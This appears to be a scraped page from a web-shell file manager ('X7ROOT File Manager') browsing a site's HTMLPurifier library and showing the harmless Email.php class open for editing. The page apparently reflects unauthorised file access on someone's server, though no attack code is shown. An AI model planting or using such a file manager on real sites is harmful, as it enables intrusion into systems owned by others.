X7ROOT File Manager
Current Path:
/home/cbholdings/pasukulu/lib/htmlpurifier/HTMLPurifier/AttrDef/URI
home
/
cbholdings
/
pasukulu
/
lib
/
htmlpurifier
/
HTMLPurifier
/
AttrDef
/
URI
/
📁
..
📁
Email
📄
Email.php
(343 B)
📄
Host.php
(5.28 KB)
📄
IPv4.php
(998 B)
📄
IPv6.php
(2.42 KB)
Editing: Email.php
<?php abstract class HTMLPurifier_AttrDef_URI_Email extends HTMLPurifier_AttrDef { /** * Unpacks a mailbox into its display-name and address * @param string $string * @return mixed */ public function unpack($string) { // needs to be implemented } } // sub-implementations // vim: et sw=4 sts=4
Upload File
Create Folder